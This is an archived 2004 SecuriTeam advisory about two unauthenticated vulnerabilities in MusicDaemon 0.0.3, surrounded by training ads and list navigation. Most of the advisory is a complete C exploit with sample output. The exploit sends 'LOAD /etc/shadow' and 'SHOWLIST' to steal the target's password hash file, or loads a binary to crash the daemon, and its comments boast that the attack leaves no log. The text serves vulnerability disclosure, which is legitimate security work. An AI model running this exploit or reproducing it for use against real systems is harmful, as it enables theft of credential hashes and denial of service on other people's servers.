Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Exploits-HackingTools
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[UNIX] Music Daemon DoS and File Disclosure Vulnerabilities

from [SecuriTeam] Network Security [Permanent Link]
Subject: [UNIX] Music Daemon DoS and File Disclosure Vulnerabilities
Date: 26 Aug 2004 14:08:29 +0200 
The following security advisory is sent to the securiteam mailing list, and can 
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html 

- - - - - - - - -



  Music Daemon DoS and File Disclosure Vulnerabilities
------------------------------------------------------------------------


SUMMARY

 <http://musicdaemon.sourceforge.net/about.xml> Music daemon (musicd) is a 
"music player designed to run as a independent server where different 
front-end can connect to control the play or get information about what is 
playing etc".

Two remotely exploitable vulnerabilities have been found in the product, 
one allows attackers to cause the program to no longer respond to 
legitimate users, the other allows reading of sensitive files, such as the 
/etc/shadow file.

DETAILS

Vulnerable Systems:
 * MusicDaemon version 0.0.3 and prior

Exploit:
/* MusicDaemon <= 0.0.3 v2 Remote /etc/shadow Stealer / DoS
* Vulnerability discovered by: Tal0n 05-22-04
* Exploit code by: Tal0n 05-22-04
*
* Greets to: atomix, vile, ttl, foxtrot, uberuser, d4rkgr3y, blinded, 
wsxz,
* serinth, phreaked, h3x4gr4m, xaxisx, hex, phawnky, brotroxer, xires,
* bsdaemon, r4t, mal0, drug5t0r3, skilar, lostbyte, peanuter, and over_g
*
* MusicDaemon MUST be running as root, which it does by default anyways.
* Tested on Slackware 9 and Redhat 9, but should work generically since 
the
* nature of this vulnerability doesn't require
* shellcode or return addresses.
*
*
* Client Side View:
*
* root@vortex:~/test# ./md-xplv2 127.0.0.1 1234 shadow
*
* MusicDaemon <= 0.0.3 Remote /etc/shadow Stealer
*
* Connected to 127.0.0.1:1234...
* Sending exploit data...
*
* <*** /etc/shadow file from 127.0.0.1 ***>
*
* Hello
* <snipped for privacy>
* ......
* bin:*:9797:0:::::
* ftp:*:9797:0:::::
* sshd:*:9797:0:::::
* ......
* </snipped for privacy>
*
* <*** End /etc/shadow file ***>
*
* root@vortex:~/test#
*
* Server Side View:
*
* root@vortex:~/test/musicdaemon-0.0.3/src# ./musicd -c ../musicd.conf -p  
1234
* Using configuration: ../musicd.conf
* [Mon May 17 05:26:07 2004] cmd_set() called
* Binding to port 5555.
* [Mon May 17 05:26:07 2004] Message for nobody: VALUE: LISTEN-PORT=5555
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called
* [Mon May 17 05:26:07 2004] cmd_modulescandir() called Binding to port 
1234.
* [Mon May 17 05:26:11 2004] New connection!
* [Mon May 17 05:26:11 2004] cmd_load() called
* [Mon May 17 05:26:13 2004] cmd_show() called
* [Mon May 17 05:26:20 2004] Client lost.
*
*
* As you can see, it simply makes a connection, sends the commands, and
* leaves. MusicDaemon doesn't even log that new connection's IPs that I
* know of. Works very well, eh? :)
*
* The vulnerability is in where the is no authenciation for 1. For 2, it
* will let you "LOAD" any file on the box if you have the correct 
privledges,
* and by default, as I said before, it runs as root, unless you change the
* configuration file to make it run as a different user.
*
* After we "LOAD" the /etc/shadow file, we do a "SHOWLIST" so we can grab
* the contents of the actual file. You can subtitute any file you want in
* for /etc/shadow, I just coded it to grab it because it being such an
* important system file if you know what I mean ;).
*
* As for the DoS, if you "LOAD" any binary on the system, then use 
"SHOWLIST",
* it will crash music daemon.
*
*
*/
  
  
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
  
int main(int argc, char *argv[]) {
  
char buffer[16384];
  
char *xpldata1 = "LOAD /etc/shadow\r\n";
char *xpldata2 = "SHOWLIST\r\n";
char *xpldata3 = "CLEAR\r\n";
char *dosdata1 = "LOAD /bin/cat\r\n";
char *dosdata2 = "SHOWLIST\r\n";
char *dosdata3 = "CLEAR\r\n";
  
int len1 = strlen(xpldata1);
int len2 = strlen(xpldata2);
int len3 = strlen(xpldata3);
int len4 = strlen(dosdata1);
int len5 = strlen(dosdata2);
int len6 = strlen(dosdata3);
  
if(argc !=  4) {
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS");
printf("\nDiscovered and Coded by: Tal0n
05-22-04\n");
printf("\nUsage: %s <host> <port> <option>\n",
argv[0]);
printf("\nOptions:");
printf("\n\t\tshadow - Steal /etc/shadow file");
printf("\n\t\tdos - DoS Music Daemon\n\n");
return 0; }
  
printf("\nMusicDaemon <= 0.0.3 Remote /etc/shadow
Stealer / DoS\n\n");
  
int sock;
struct sockaddr_in remote;
  
remote.sin_family = AF_INET;
remote.sin_port = htons(atoi(argv[2]));
remote.sin_addr.s_addr = inet_addr(argv[1]);
  
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
printf("\nError: Can't create socket!\n\n");
return -1; }
  
if(connect(sock,(struct sockaddr *)&remote,
sizeof(struct sockaddr)) < 0) {
printf("\nError: Can't connect to %s:%s!\n\n",
argv[1], argv[2]);
return -1; }
  
printf("Connected to %s:%s...\n", argv[1], argv[2]);
  
if(strcmp(argv[3], "dos") == 0) {
  
printf("Sending DoS data...\n");
  
send(sock, dosdata1, len4, 0);
  
sleep(2);
  
send(sock, dosdata2, len5, 0);
  
sleep(2);
  
send(sock, dosdata3, len6, 0);
  
printf("\nTarget %s DoS'd!\n\n", argv[1]);
  
return 0; }
  
if(strcmp(argv[3], "shadow") == 0) {
  
printf("Sending exploit data...\n");
  
send(sock, xpldata1, len1, 0);
  
sleep(2);
  
send(sock, xpldata2, len2, 0);
  
sleep(5);
  
printf("Done! Grabbing /etc/shadow...\n");
  
memset(buffer, 0, sizeof(buffer));
read(sock, buffer, sizeof(buffer));
  
sleep(2);
  
printf("\n<*** /etc/shadow file from %s ***>\n\n",
argv[1]);
printf("%s", buffer);
printf("\n<*** End /etc/shadow file ***>\n\n");
  
send(sock, xpldata3, len3, 0);
  
sleep(1);
  
close(sock);
  
return 0; }
  
return 0; }


ADDITIONAL INFORMATION

The information has been provided by Tal0n.



======================================== 


This bulletin is sent to members of the SecuriTeam mailing list. 
To unsubscribe from the list, send mail with an empty subject line and body to: 
list-unsubscribe@securiteam.com 
In order to subscribe to the mailing list, simply forward this email to: 
list-subscribe@securiteam.com 


==================== 
==================== 

DISCLAIMER: 
The information in this bulletin is provided "AS IS" without warranty of any 
kind. 
In no event shall we be liable for any damages whatsoever including direct, 
indirect, incidental, consequential, loss of business profits or special 
damages.
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [UNIX] Music Daemon DoS and File Disclosure Vulnerabilities, SecuriTeam <=
Previous by Date:  [NT] NtRegmon Local Denial of Service, SecuriTeam
Next by Date:  [EXPL] Winamp Skin File (.wsz) Remote Code Execution Exploit, SecuriTeam
Previous by Thread:  [NT] NtRegmon Local Denial of Service, SecuriTeam
Next by Thread:  [EXPL] Winamp Skin File (.wsz) Remote Code Execution Exploit, SecuriTeam
Indexes:  [Date] [Thread] [Top] [All Lists]